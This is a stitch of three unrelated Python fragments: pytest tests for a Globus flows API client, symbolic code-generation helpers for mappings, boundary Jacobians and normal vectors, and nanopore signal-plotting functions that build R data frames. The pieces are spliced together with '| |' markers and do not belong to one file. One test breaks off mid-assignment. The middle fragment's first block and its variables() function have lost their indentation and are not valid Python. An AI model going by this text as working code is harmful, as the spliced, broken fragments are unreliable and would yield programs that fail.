    assert set(data["flow_administrators"]) == {"a1", "a2", "a3", "a4"}
@pytest.mark.parametrize("method", ("deploy_flow", "update_flow"))
def test_invalid_flow_definition_failure(fc, method):
    """Verify that an invalid flow definition triggers a failure."""
    # Both deploy and update share the validation path, so the same
    # bogus definition must be rejected by either entry point.
    target = getattr(fc, method)
    with pytest.raises(flows_client.FlowValidationError):
        target(
            flow_id="bogus-id",
            flow_definition={"bogus": True},
            title="title",
            validate_definition=True,
        )
@pytest.mark.parametrize("method", ("deploy_flow", "update_flow"))
def test_invalid_input_schema_failure(fc, method):
    """Verify that an invalid input schema triggers a failure."""
    # The flow definition is valid here; only the input schema is bad,
    # and schema validation alone must raise for both entry points.
    target = getattr(fc, method)
    with pytest.raises(flows_client.FlowValidationError):
        target(
            flow_id="bogus-id",
            flow_definition=VALID_FLOW_DEFINITION,
            input_schema={"required": False},
            title="title",
            validate_definition=False,
            validate_schema=True,
        )
def test_update_flow_data_construction(fc, mocked_responses):
    """Verify the flow JSON data is constructed correctly."""
    mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
    # Sentinel values for every supported field; the captured PUT body is
    # compared against this dict wholesale.
    expected: Dict[str, Union[str, Dict[str, Any]]] = {
        "definition": VALID_FLOW_DEFINITION,
        "input_schema": {"Comment": "flow-input-schema"},
        "title": "--title--",
        "subtitle": "--subtitle--",
        "description": "--description--",
        "keywords": "--keywords--",
        "flow_viewers": ["--flow_viewers--"],
        "flow_starters": ["--flow_starters--"],
        "flow_administrators": ["--flow_administrators--"],
        "subscription_id": "--subscription_id--",
    }
    fc.update_flow(
        # Arguments that affect the JSON data
        flow_id="bogus",
        flow_definition=expected["definition"],
        input_schema=expected["input_schema"],
        title=expected["title"],
        subtitle=expected["subtitle"],
        description=expected["description"],
        keywords=expected["keywords"],
        flow_viewers=expected["flow_viewers"],
        flow_starters=expected["flow_starters"],
        flow_administrators=expected["flow_administrators"],
        subscription_id=expected["subscription_id"],
        # Other arguments
        validate_definition=True,
        validate_schema=True,
    )
    data = json.loads(mocked_responses.calls[0].request.body)
    assert data == expected
@pytest.mark.parametrize("input_schema, expected", ((None, False), ({}, True)))
def test_update_flow_exclude_most_false_values(
    fc, mocked_responses, input_schema, expected
):
    """Verify the *input_schema* is not excluded even if it's false-y."""
    mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
    fc.update_flow(
        # *input_schema* is being tested for inclusion/exclusion.
        input_schema=input_schema,
        # False-y values with different fates (see assertions below): the
        # empty-string subtitle is kept in an update, while the None
        # description is dropped.
        subtitle="",
        description=None,
        # Mandatory arguments, but not under test.
        flow_id="bogus",
        flow_definition=VALID_FLOW_DEFINITION,
        title="--title--",
        validate_definition=False,
        validate_schema=False,
    )
    data = json.loads(mocked_responses.calls[0].request.body)
    assert "subtitle" in data
    assert "description" not in data
    assert ("input_schema" in data) is expected
def test_update_flow_aliases(fc, mocked_responses):
    """Verify that viewer/starter/admin aliases are still supported.

    Mirrors test_deploy_flow_aliases for the update (PUT) code path.
    """
    mocked_responses.add("PUT", "https://flows.api.globus.org/flows/bogus")
    fc.update_flow(
        # Flow viewers and aliases
        flow_viewers=["v1", "v2"],
        visible_to=["v3"],
        viewers=["v4"],
        # Flow starters and aliases
        flow_starters=["s1", "s2"],
        runnable_by=["s3"],
        starters=["s4"],
        # Flow admins and aliases
        flow_administrators=["a1", "a2"],
        administered_by=["a3"],
        administrators=["a4"],
        # Everything below is mandatory but irrelevant to this test.
        flow_id="bogus",
        flow_definition=VALID_FLOW_DEFINITION,
        title="",
        validate_definition=False,
        validate_schema=False,
    )
    data = json.loads(mocked_responses.calls[0].request.body)
    # Compared as sets: the merge order of aliases is unspecified.
    assert set(data["flow_viewers"]) == {"v1", "v2", "v3", "v4"}
    assert set(data["flow_starters"]) == {"s1", "s2", "s3", "s4"}
    assert set(data["flow_administrators"]) == {"a1", "a2", "a3", "a4"}
def test_get_flow(fc, mocked_responses):
    """Verify the URL that is used to get a flow definition."""
    flow_url = "https://flows.api.globus.org/flows/bogus"
    mocked_responses.add("GET", flow_url)
    fc.get_flow("bogus")
    # The flow ID must be appended to the /flows endpoint.
    recorded_request = mocked_responses.calls[0].request
    assert recorded_request.url == flow_url
@pytest.mark.parametrize(
    "role, roles, expected, message",
    (
        (None, None, {}, "parameters incorrectly included"),
        # role
        ("", None, {}, "false-y *role* must not be included"),
        ("1", None, {"filter_role": "1"}, "*role* must be included"),
        # roles
        (None, tuple(), {}, "false-y *roles* must not be included"),
        (None, ("2", "3"), {"filter_roles": "2,3"}, "*roles* must be included"),
        # Precedence
        ("1", ("2", "3"), {"filter_role": "1"}, "*role* must override *roles*"),
    ),
)
def test_list_flows_role_precedence(
    fc, mocked_responses, role, roles, expected, message
):
    """Verify the *role* and *roles* precedence rules."""
    mocked_responses.add("GET", "https://flows.api.globus.org/flows")
    fc.list_flows(role=role, roles=roles)
    # Parse the captured request's query string back into a dict so the
    # presence/absence of each filter parameter can be asserted.
    query: str = urllib.parse.urlparse(mocked_responses.calls[0].request.url).query
    data = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
    for key in ("filter_role", "filter_roles"):
        if key in expected:
            assert key in data, message
            assert data[key] == expected[key], f"*{key}* value does not match"
        else:
            assert key not in data, message
@pytest.mark.parametrize(
    "marker, per_page, expected, message",
    (
        (None, None, {}, "parameters incorrectly included"),
        # marker
        ("", None, {}, "false-y *marker* must not be included"),
        ("m", None, {"pagination_token": "m"}, "*marker* must be included"),
        # per_page
        (None, 0, {}, "false-y *per_page* must not be included"),
        (None, 10, {"per_page": "10"}, "*per_page* must be included"),
        # Precedence
        ("m", 10, {"pagination_token": "m"}, "*marker* must override *per_page*"),
    ),
)
def test_list_flows_pagination_parameters(
    fc, mocked_responses, marker, per_page, expected, message
):
    """Verify *marker* and *per_page* precedence rules."""
    mocked_responses.add("GET", "https://flows.api.globus.org/flows")
    fc.list_flows(marker=marker, per_page=per_page)
    # Parse the captured request's query string back into a dict so the
    # presence/absence of each pagination parameter can be asserted.
    query: str = urllib.parse.urlparse(mocked_responses.calls[0].request.url).query
    data = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
    for key in ("pagination_token", "per_page"):
        if key in expected:
            assert key in data, message
            assert data[key] == expected[key], f"*{key}* value does not match"
        else:
            assert key not in data, message
def test_list_flows_filters(fc, mocked_responses):
"""Verify that filters are applied to the query parameters."""
mocked_responses.add("GET", "https://flows.api.globus.org/flows")
fc.list_flows(role="role", filters={"1": "2", "filter_role": "bogus"})
query: str = | |
dim = space.ldim
ops = _logical_partial_derivatives[:dim]
# ... mapping components and their derivatives
components = [M[i] for i in range(0, dim)]
elements = list(components)
if nderiv > 0:
elements += [d(M[i]) for d in ops for i in range(0, dim)]
if nderiv > 1:
elements += [d1(d2(M[i])) for e,d1 in enumerate(ops)
for d2 in ops[:e+1]
for i in range(0, dim)]
if nderiv > 2:
raise NotImplementedError('TODO')
# ...
# ... weights and their derivatives
# TODO check if 'w' exist already
weights = element_of(space, name='w')
weights_elements = [weights]
if nderiv > 0:
weights_elements += [d(weights) for d in ops]
if nderiv > 1:
weights_elements += [d1(d2(weights)) for e,d1 in enumerate(ops)
for d2 in ops[:e+1]]
if nderiv > 2:
raise NotImplementedError('TODO')
# ...
stmts = []
# declarations
stmts += [Comment('declarations')]
for atom in elements + weights_elements:
atom_name = SymbolicExpr(atom).name
val_name = atom_name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(atom_name, val)
stmts += [stmt]
# assignements
stmts += [Comment('rationalize')]
# 0 order terms
for i in range(dim):
w = SymbolicExpr(weights)
u = SymbolicExpr(M[i])
val_name = u.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val, u / w )
stmts += [stmt]
# 1 order terms
if nderiv >= 1:
for d in ops:
w = SymbolicExpr( weights )
dw = SymbolicExpr(d(weights))
for i in range(dim):
u = SymbolicExpr( M[i] )
du = SymbolicExpr(d(M[i]))
val_name = du.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val, du / w - u * dw / w**2 )
stmts += [stmt]
# 2 order terms
if nderiv >= 2:
for e, d1 in enumerate(ops):
for d2 in ops[:e+1]:
w = SymbolicExpr( weights )
d1w = SymbolicExpr( d1(weights) )
d2w = SymbolicExpr( d2(weights) )
d1d2w = SymbolicExpr(d1(d2(weights)))
for i in range(dim):
u = SymbolicExpr( M[i] )
d1u = SymbolicExpr( d1(M[i]) )
d2u = SymbolicExpr( d2(M[i]) )
d1d2u = SymbolicExpr(d1(d2(M[i])))
val_name = d1d2u.name + '_values'
val = IndexedBase(val_name)[indices_quad]
stmt = Assign(val,
d1d2u / w - u * d1d2w / w**2
- d1w * d2u / w**2 - d2w * d1u / w**2
+ 2 * u * d1w * d2w / w**3)
stmts += [stmt]
return stmts
#==============================================================================
def filter_product(indices, args, boundary):
    """Return the product of the indexed factors, skipping any axis masked
    by *boundary*.

    The boundary axis is perpendicular to the integration directions, so
    its factor is omitted from the product.
    """
    masked_axes = []
    if boundary:
        if not isinstance(boundary, Boundary):
            raise TypeError
        masked_axes.append(boundary.axis)
    # discrete_boundary gives the perpendicular indices, then we need to
    # remove them from directions
    factors = [args[axis][indices[axis]]
               for axis in range(len(indices))
               if axis not in masked_axes]
    return Mul(*factors)
#==============================================================================
# TODO remove it later
def filter_loops(indices, ranges, body, boundary, boundary_basis=False):
    """Wrap *body* in nested For loops, pinning the boundary axis.

    One loop per axis is created (the last axis becomes the innermost
    loop).  On the axis perpendicular to *boundary* the loop is restricted
    to a single iteration: the first point for ext == -1, the last point
    for ext == +1.  The resulting nest is passed through fusion_loops().
    """
    quad_mask = []
    quad_ext = []
    if boundary:
        if isinstance(boundary, Boundary):
            quad_mask = [boundary.axis]
            quad_ext = [boundary.ext]
        else:
            raise TypeError
    # discrete_boundary gives the perpendicular indices, then we need to
    # remove them from directions
    dim = len(indices)
    for i in range(dim-1,-1,-1):
        rx = ranges[i]
        x = indices[i]
        start = rx.start
        end = rx.stop
        if i in quad_mask:
            # restrict the masked axis to a single quadrature point chosen
            # by the boundary orientation
            i_index = quad_mask.index(i)
            ext = quad_ext[i_index]
            if ext == -1:
                end = start + 1
            elif ext == 1:
                start = end - 1
            else:
                raise ValueError('> Wrong value for ext. It should be -1 or 1')
        rx = Range(start, end)
        body = [For(x, rx, body)]
    body = fusion_loops(body)
    return body
#==============================================================================
def select_loops(indices, ranges, body, boundary, boundary_basis=False):
    """Wrap *body* in nested For loops over every axis not masked by
    *boundary*, then fuse the nest via fusion_loops().

    Unlike filter_loops(), the masked (perpendicular) axis simply gets no
    loop at all instead of a single-iteration loop.
    """
    masked_axes = []
    if boundary:
        if not isinstance(boundary, Boundary):
            raise TypeError
        # discrete_boundary gives the perpendicular indices, then we need
        # to remove them from directions
        masked_axes = [boundary.axis]
    # Build from the innermost loop outwards: the last axis is innermost.
    for axis in reversed(range(len(indices))):
        if axis in masked_axes:
            continue
        loop_range = Range(ranges[axis].start, ranges[axis].stop)
        body = [For(indices[axis], loop_range, body)]
    return fusion_loops(body)
#==============================================================================
def fusion_loops(loops):
    """Fuse a chain of singly-nested For loops into one Product loop.

    Walks down *loops* while it consists of a single For statement,
    collecting each level's loop index (or indices) and range(s).  If more
    than one range was collected, the whole nest is replaced by a single
    For over the Product of all ranges; otherwise the original loop nest
    is returned unchanged.

    Raises ValueError if a Product loop's target is not a tuple/list of
    indices, and TypeError for any other iterable kind.
    """
    ranges = []
    indices = []
    original_loops = loops
    while len(loops) == 1 and isinstance(loops[0], For):
        loop = loops[0]
        target = loop.target
        iterable = loop.iterable
        if isinstance(iterable, Product):
            # BUG FIX: validate the target *before* unpacking it, so bad
            # input raises the intended ValueError instead of an incidental
            # TypeError from list(target).
            if not isinstance(target, (tuple, list, Tuple)):
                raise ValueError('target must be a list or a tuple of indices')
            ranges += list(iterable.elements)
            indices += list(target)
        elif isinstance(iterable, Range):
            ranges.append(iterable)
            indices.append(target)
        else:
            # (message typo fixed: 'only range an product')
            raise TypeError('only Range and Product are supported')
        loops = loop.body
    if len(ranges) > 1:
        return [For(indices, Product(*ranges), loops)]
    # Nothing to fuse: return the original loop nest untouched.
    return original_loops
#==============================================================================
def compute_boundary_jacobian(parent_namespace, boundary, mapping=None):
    """Generate statements computing the boundary surface Jacobian sqrt(g).

    With no mapping there is nothing to compute and an empty list is
    returned.  Otherwise the Jacobian column along the boundary axis is
    dropped, the metric determinant g = det(Jm^T Jm) of the remaining
    tangential columns is formed, and sqrt(g) is assigned to the
    pre-declared 'det_jac_bnd' symbol from *parent_namespace*.
    """
    # Sanity check on arguments
    if not isinstance(boundary, Boundary):
        raise TypeError(boundary)
    if mapping is None:
        stmts = []
    else:
        # Compute metric determinant g on manifold
        J = SymbolicExpr(mapping.jacobian)
        Jm = J[:, [i for i in range(J.shape[1]) if i != boundary.axis]]
        g = (Jm.T * Jm).det()
        # Create statements for computing sqrt(g)
        det_jac_bnd = parent_namespace['det_jac_bnd']
        stmts = [Assign(det_jac_bnd, sympy_sqrt(g))]
    return stmts
#==============================================================================
def compute_normal_vector(parent_namespace, vector, boundary, mapping=None):
    """Generate statements assigning the unit outward normal on *boundary*
    to the symbols in *vector*.

    Without a mapping the normal is +/-ext along the boundary axis and zero
    elsewhere.  With a mapping, the relevant row of J^(-1) is built from
    cofactors of J, oriented by ext, and normalized in place.
    """
    # Sanity check on arguments
    if isinstance(boundary, Boundary):
        axis = boundary.axis
        ext = boundary.ext
    else:
        raise TypeError(boundary)
    # If there is no mapping, normal vector has only one non-zero component,
    # which is +1 or -1 according to the orientation of the boundary.
    if mapping is None:
        return [Assign(v, ext if i==axis else 0) for i, v in enumerate(vector)]
    # Given the Jacobian matrix J, we need to extract the (i=axis) row of
    # J^(-1) and then normalize it. We recall that J^(-1)[i, j] is equal to
    # the cofactor of J[i, j] divided by det(J). For efficiency we only
    # compute the cofactors C[i=0:dim] of the (j=axis) column of J, and we
    # do not divide them by det(J) because the normal vector will need to
    # be normalized anyway.
    #
    # NOTE: we also change the vector orientation according to 'ext'
    J = SymbolicExpr(mapping.jacobian)
    values = [ext * J.cofactor(i, j=axis) for i in range(J.shape[0])]
    # Create statements for computing normal vector components
    stmts = [Assign(lhs, rhs) for lhs, rhs in zip(vector, values)]
    # Normalize vector
    inv_norm_variable = Symbol('inv_norm')
    inv_norm_value = 1 / sympy_sqrt(sum(v**2 for v in values))
    stmts += [Assign(inv_norm_variable, inv_norm_value)]
    stmts += [AugAssign(v, '*', inv_norm_variable) for v in vector]
    return stmts
#==============================================================================
def compute_tangent_vector(parent_namespace, vector, boundary, mapping):
    """Generate statements assigning the boundary tangent vector.

    Placeholder mirroring compute_normal_vector(); not implemented yet.
    """
    raise NotImplementedError('TODO')
#==============================================================================
# Matches a range specification embedded in a variable-name string: either
# numeric ('0:3', ':3') or alphabetic ('a:c', ':c').  Used by variables()
# to expand names like 'x0:3' into multiple symbols.
_range = re.compile('([0-9]*:[0-9]+|[a-zA-Z]?:[a-zA-Z])')
def variables(names, dtype, **args):
def contruct_variable(cls, name, dtype, rank, **args):
if issubclass(cls, Variable):
return Variable(dtype, name, rank=rank, **args)
elif issubclass(cls, IndexedVariable):
return IndexedVariable(name, dtype=dtype, rank=rank, **args)
elif cls==Idx:
assert dtype == "int"
rank = args.pop('rank', 0)
assert rank == 0
return Idx(name)
else:
raise TypeError('only Variables and IndexedVariables are supported')
result = []
cls = args.pop('cls', Variable)
rank = args.pop('rank', 0)
if isinstance(names, str):
marker = 0
literals = [r'\,', r'\:', r'\ ']
for i in range(len(literals)):
lit = literals.pop(0)
if lit in names:
while chr(marker) in names:
marker += 1
lit_char = chr(marker)
marker += 1
names = names.replace(lit, lit_char)
literals.append((lit_char, lit[1:]))
def literal(s):
if literals:
for c, l in literals:
s = s.replace(c, l)
return s
names = names.strip()
as_seq = names.endswith(',')
if as_seq:
names = names[:-1].rstrip()
if not names:
raise ValueError('no symbols given')
# split on commas
names = [n.strip() for n in names.split(',')]
if not all(n for n in names):
raise ValueError('missing symbol between commas')
# split on spaces
for i in range(len(names) - 1, -1, -1):
names[i: i + 1] = names[i].split()
seq = args.pop('seq', as_seq)
for name in names:
if not name:
raise ValueError('missing variable')
if ':' not in name:
var = contruct_variable(cls, literal(name), dtype, rank, **args)
result.append(var)
continue
split = _range.split(name)
# remove 1 layer of bounding parentheses around ranges
for i in range(len(split) - 1):
if i and ':' in split[i] and split[i] != ':' and \
split[i - 1].endswith('(') and \
split[i + 1].startswith(')'):
split[i - 1] = split[i - 1][:-1]
split[i + 1] = split[i + 1][1:]
for i, s in enumerate(split):
if ':' in s:
if s[-1].endswith(':'):
raise ValueError('missing end range')
a, b = s.split(':')
if b[-1] in string.digits:
a = 0 if not a else int(a)
b = int(b)
split[i] = [str(c) for c in range(a, b)]
else:
a = a or 'a'
split[i] = [string.ascii_letters[c] for c in range(
string.ascii_letters.index(a),
string.ascii_letters.index(b) + 1)] # inclusive
| |
if r_means is not None]
return np.column_stack(reg_events)
def get_event_data(
        all_reg_data, plot_types, num_bases, corrected_group,
        overplot_thresh, group_num='Group1'):
    """Build the R data frame backing 'Violin' overplot regions.

    For every region whose plot type is 'Violin', collects each read's
    per-base mean signal level (per strand) into parallel columns:
    Position, Signal, Strand, Region, plus a constant Group label.
    corrected_group and overplot_thresh are unused here; they are kept so
    all get_*_data helpers share one signature (see get_plot_types_data).
    """
    Position, Signal, Strand, Region = [], [], [], []
    for reg_plot_sig, (
            region_i, interval_start, chrom, reg_reads) in zip(
                plot_types, all_reg_data):
        if reg_plot_sig != 'Violin': continue
        for strand in ('+', '-'):
            # skip strands with no mapped reads in this region
            if sum(r_data.strand == strand
                   for r_data in reg_reads) == 0:
                continue
            reg_events = get_reg_events(
                reg_reads, interval_start, num_bases, strand)
            for pos, base_read_means in enumerate(reg_events):
                # skip bases with no coverage
                if sum(~np.isnan(base_read_means)) == 0:
                    continue
                # remove nan regions of reads from partial overlaps
                base_read_means = base_read_means[
                    ~np.isnan(base_read_means)]
                Position.extend(repeat(
                    pos + interval_start, base_read_means.shape[0]))
                Signal.extend(base_read_means)
                Strand.extend(repeat(
                    FWD_STRAND if strand == '+' else REV_STRAND,
                    base_read_means.shape[0]))
                Region.extend(repeat(
                    region_i, base_read_means.shape[0]))
    return r.DataFrame({
        'Position':r.IntVector(Position),
        'Signal':r.FloatVector(Signal),
        'Strand':r.StrVector(Strand),
        'Region':r.StrVector(Region),
        'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_boxplot_data(
        all_reg_data, plot_types, num_bases, corrected_group,
        overplot_thresh, group_num='Group1'):
    """Build the R data frame backing 'Boxplot' overplot regions.

    For each 'Boxplot' region and strand, computes a per-base five-number
    summary (min, 25th, median, 75th, max percentile) of the reads' mean
    signal levels.  corrected_group and overplot_thresh are unused here;
    they are kept so all get_*_data helpers share one signature.
    """
    (Position, SigMin, Sig25, SigMed, Sig75, SigMax, Strand, Region) = (
        [], [], [], [], [], [], [], [])
    for reg_plot_sig, (
            region_i, interval_start, chrom, reg_reads) in zip(
                plot_types, all_reg_data):
        if reg_plot_sig != 'Boxplot': continue
        for strand in ('+', '-'):
            # skip strands with no mapped reads in this region
            if sum(r_data.strand == strand
                   for r_data in reg_reads) == 0:
                continue
            reg_events = get_reg_events(
                reg_reads, interval_start, num_bases, strand)
            for pos, base_read_means in enumerate(reg_events):
                # skip regions with no coverage
                if sum(~np.isnan(base_read_means)) == 0:
                    continue
                # remove nan regions of reads from partial overlaps
                base_read_means = base_read_means[
                    ~np.isnan(base_read_means)]
                Position.append(pos + interval_start)
                SigMin.append(np.percentile(base_read_means, 0))
                Sig25.append(np.percentile(base_read_means, 25))
                SigMed.append(np.percentile(base_read_means, 50))
                Sig75.append(np.percentile(base_read_means, 75))
                SigMax.append(np.percentile(base_read_means, 100))
                Strand.append(
                    FWD_STRAND if strand == '+' else REV_STRAND)
                Region.append(region_i)
    return r.DataFrame({
        'Position':r.IntVector(Position),
        'SigMin':r.FloatVector(SigMin),
        'Sig25':r.FloatVector(Sig25),
        'SigMed':r.FloatVector(SigMed),
        'Sig75':r.FloatVector(Sig75),
        'SigMax':r.FloatVector(SigMax),
        'Strand':r.StrVector(Strand),
        'Region':r.StrVector(Region),
        'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_quant_data(
        all_reg_data, plot_types, num_bases, corrected_group,
        overplot_thresh, group_num='Group1', pos_offest=0,
        pcntls=[1,10,20,30,40,49]):
    """Build the R data frame backing 'Quantile' overplot regions.

    For each 'Quantile' region and strand, emits paired lower/upper
    percentile bands (pcntls[i] and 100 - pcntls[i]) of the reads' mean
    signal per base.  NOTE(review): 'pos_offest' is misspelled but is part
    of the public interface (callers pass it by keyword, see
    get_plot_types_data), so it cannot be renamed here.  The mutable
    default for *pcntls* is only read, never modified, below.
    """
    upper_pcntls = [100 - pcntl for pcntl in pcntls]
    Position, Lower, Upper, Strand, Region = [], [], [], [], []
    for reg_plot_sig, (
            region_i, interval_start, chrom, reg_reads) in zip(
                plot_types, all_reg_data):
        if reg_plot_sig != 'Quantile': continue
        for strand in ('+', '-'):
            # skip strands with no mapped reads in this region
            if sum(r_data.strand == strand
                   for r_data in reg_reads) == 0:
                continue
            reg_events = get_reg_events(
                reg_reads, interval_start, num_bases, strand)
            for pos, base_read_means in enumerate(reg_events):
                # skip regions with no coverage
                if sum(~np.isnan(base_read_means)) == 0:
                    continue
                # remove nan regions of reads from partial overlaps
                base_read_means = base_read_means[
                    ~np.isnan(base_read_means)]
                Position.extend(list(repeat(
                    pos + interval_start + pos_offest, len(pcntls))))
                Lower.extend(np.percentile(
                    base_read_means, pcntls, interpolation='nearest'))
                Upper.extend(np.percentile(
                    base_read_means, upper_pcntls,
                    interpolation='nearest'))
                Strand.extend(
                    list(repeat(FWD_STRAND if strand == '+' else
                                REV_STRAND, len(pcntls))))
                Region.extend(list(repeat(region_i, len(pcntls))))
    return r.DataFrame({
        'Position':r.FloatVector(Position),
        'Lower':r.FloatVector(Lower),
        'Upper':r.FloatVector(Upper),
        'Strand':r.StrVector(Strand),
        'Region':r.StrVector(Region),
        'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_signal(read_fn, read_start_rel_to_raw, num_obs, corrected_group):
    """Load and re-normalize *num_obs* raw signal values from a FAST5 file.

    Reads the shift/scale and winsorizing limits stored by the correction
    script under /Analyses/<corrected_group>, so the returned signal is
    normalized identically to the original processing run.
    """
    with h5py.File(read_fn) as fast5_data:
        # retrieve shift and scale computed in correction script
        corr_subgrp = fast5_data['/Analyses/' + corrected_group]
        shift = corr_subgrp.attrs['shift']
        scale = corr_subgrp.attrs['scale']
        lower_lim = corr_subgrp.attrs['lower_lim']
        upper_lim = corr_subgrp.attrs['upper_lim']
        # NOTE(review): `.values()[0]` indexes a values view, which only
        # works on Python 2 / old h5py; Python 3 would need list(...)[0].
        # Confirm the supported interpreter before modernizing.
        r_sig, scale_values = nh.normalize_raw_signal(
            fast5_data['/Raw/Reads'].values()[0]['Signal'],
            read_start_rel_to_raw, num_obs, shift=shift, scale=scale,
            lower_lim=lower_lim, upper_lim=upper_lim)
    return r_sig
def get_signal_data(
        all_reg_data, plot_types, num_bases, corrected_group,
        overplot_thresh, group_num='Group1'):
    """Build the R data frame of per-observation raw signal for 'Signal'
    and 'Downsample' regions.

    For 'Downsample' regions, at most *overplot_thresh* reads per strand
    are kept (randomly chosen).  Each read's raw signal over the plotted
    interval is loaded via get_signal() and laid out with fractional
    positions (np.linspace) within each base so every observation gets an
    x-coordinate.  corrected_group is unused here; the signature matches
    the other get_*_data helpers.
    """
    Position, Signal, Read, Strand, Region = [], [], [], [], []
    for reg_plot_sig, (
            region_i, interval_start, chrom, reg_reads) in zip(
                plot_types, all_reg_data):
        if not reg_plot_sig in ('Signal', 'Downsample'): continue
        if reg_plot_sig == 'Downsample':
            plus_reads = [r_data for r_data in reg_reads
                          if r_data.strand == '+']
            minus_reads = [r_data for r_data in reg_reads
                           if r_data.strand == '-']
            # randomly select reads to plot if too many
            if len(plus_reads) > overplot_thresh:
                np.random.shuffle(plus_reads)
                plus_reads = plus_reads[:overplot_thresh]
            if len(minus_reads) > overplot_thresh:
                np.random.shuffle(minus_reads)
                minus_reads = minus_reads[:overplot_thresh]
            reg_reads = plus_reads + minus_reads
        for r_num, r_data in enumerate(reg_reads):
            r_strand = r_data.strand
            segs = r_data.segs
            if r_strand == "-":
                # map reverse-strand segment boundaries onto forward raw
                # coordinates (presumably; verify against segs layout)
                segs = (segs[::-1] * -1) + segs[-1]
            if interval_start < r_data.start:
                # handle reads that start in the middle of the interval
                start_offset = r_data.start - interval_start
                overlap_seg_data = segs[:num_bases - start_offset + 1]
            else:
                start_offset = 0
                skipped_bases = interval_start - r_data.start
                overlap_seg_data = segs[
                    skipped_bases:skipped_bases + num_bases + 1]
            # number of raw observations spanned by the plotted bases
            num_reg_obs = overlap_seg_data[-1] - overlap_seg_data[0]
            if r_strand == "+":
                reg_start_rel_raw = (r_data.read_start_rel_to_raw +
                                     overlap_seg_data[0])
                r_sig = get_signal(
                    r_data.fn, reg_start_rel_raw, num_reg_obs,
                    r_data.corr_group)
            else:
                reg_start_rel_raw = (r_data.read_start_rel_to_raw +
                                     segs[-1] - overlap_seg_data[-1])
                r_sig = get_signal(
                    r_data.fn, reg_start_rel_raw, num_reg_obs,
                    r_data.corr_group)
                # reverse so the signal runs in reference orientation
                r_sig = r_sig[::-1]
            for base_i, (start, stop) in enumerate(zip(
                    overlap_seg_data[:-1], overlap_seg_data[1:])):
                # spread this base's observations evenly across [base, base+1)
                Position.extend(
                    interval_start + base_i + start_offset +
                    np.linspace(0, 1, stop - start, endpoint=False))
                Signal.extend(r_sig[start-overlap_seg_data[0]:
                                    stop-overlap_seg_data[0]])
                Read.extend(list(repeat(
                    str(r_num) + '_' + group_num, stop - start)))
                Strand.extend(list(repeat(
                    FWD_STRAND if r_strand == '+' else
                    REV_STRAND, stop - start)))
                Region.extend(list(repeat(region_i, stop - start)))
    return r.DataFrame({
        'Position':r.FloatVector(Position),
        'Signal':r.FloatVector(Signal),
        'Read':r.StrVector(Read),
        'Strand':r.StrVector(Strand),
        'Region':r.StrVector(Region),
        'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_plot_types_data(plot_args, quant_offset=0):
    """Gather all four per-region plot data frames in one call.

    :param plot_args: positional arguments shared by every per-type
        data getter (region data, base data, etc.)
    :param quant_offset: position offset forwarded to the quantile getter
    :returns: tuple of (signal, quantile, boxplot, event) R data frames
    """
    # NOTE(review): 'pos_offest' mirrors the (misspelled) keyword in
    # get_quant_data's signature elsewhere in this file -- do not "fix"
    # it here without changing the callee as well.
    signal_dat = get_signal_data(*plot_args)
    quant_dat = get_quant_data(*plot_args, pos_offest=quant_offset)
    box_dat = get_boxplot_data(*plot_args)
    event_dat = get_event_data(*plot_args)
    return signal_dat, quant_dat, box_dat, event_dat
def get_reg_base_data(all_reg_data, corrected_group, num_bases):
    """Extract the called base sequence covering each plotting region.

    :param all_reg_data: iterable of (region_i, interval_start, chrom,
        reg_reads) tuples as produced by get_region_reads
    :param corrected_group: unused here; each read record carries its own
        corr_group attribute (parameter kept for call-site compatibility)
    :param num_bases: number of bases spanned by each region
    :returns: list of base-sequence strings, one per region; positions not
        covered by any read are filled with '-'
    """
    all_reg_base_data = []
    for region_i, interval_start, chrom, reg_reads in all_reg_data:
        # try to find first read to overlap whole region
        try:
            full_cov_read = next(
                read_data for read_data in reg_reads
                if read_data.start <= interval_start and
                read_data.end >= interval_start + num_bases)
            # get seq data from first read FAST5 file
            with h5py.File(full_cov_read.fn) as r_data:
                seq = ''.join(r_data[
                    'Analyses/' + full_cov_read.corr_group +
                    '/Events']['base'])
            # stored event sequence follows the read direction; flip it to
            # genome orientation for reverse-strand reads
            r_base_data = (seq if full_cov_read.strand == "+"
                           else nh.rev_comp(seq))
            # slice out exactly the num_bases covering this region
            reg_base_data = r_base_data[
                interval_start - full_cov_read.start:
                interval_start - full_cov_read.start + num_bases]
        except StopIteration:
            # handle case where no read overlaps whole region
            # let each read contribute its sequence and fill the rest
            # with dashes
            reg_base_data = ['-',] * num_bases
            for read_data in reg_reads:
                with h5py.File(read_data.fn) as r_data:
                    seq = ''.join(r_data[
                        'Analyses/' + read_data.corr_group +
                        '/Events']['base'])
                if read_data.strand == "-":
                    seq = nh.rev_comp(seq)
                if read_data.start > interval_start:
                    # handle reads that start in the middle of a region
                    start_overlap = (interval_start + num_bases -
                                     read_data.start)
                    # NOTE(review): assumes the read reaches the region end;
                    # a shorter seq would shrink the list via this slice
                    # assignment -- confirm upstream guarantees
                    reg_base_data[-start_overlap:] = seq[:start_overlap]
                else:
                    # get the number of bases from end of read that
                    # overlap the region
                    end_overlap = read_data.end - interval_start
                    reg_base_data[:end_overlap] = seq[-end_overlap:]
            # collapse the per-position list into a single string to match
            # the full-coverage branch
            reg_base_data = ''.join(reg_base_data)
        all_reg_base_data.append(reg_base_data)
    return all_reg_base_data
def get_base_r_data(all_reg_data, all_reg_base_data):
    """Build an R data frame of per-position base labels for all regions.

    :param all_reg_data: iterable of (region_i, interval_start, chrom,
        reg_reads) tuples
    :param all_reg_base_data: matching iterable of per-region base strings
    :returns: R DataFrame with Position, Base and Region columns
    """
    base_starts, base_labels, base_regions = [], [], []
    for reg_info, reg_seq in zip(all_reg_data, all_reg_base_data):
        region_i, interval_start = reg_info[0], reg_info[1]
        for offset, base in enumerate(reg_seq):
            # NOTE(review): positions are appended as strings yet wrapped
            # in an R FloatVector below; rpy2 presumably coerces -- confirm
            base_starts.append(str(interval_start + offset))
            base_labels.append(base)
            base_regions.append(region_i)
    return r.DataFrame({
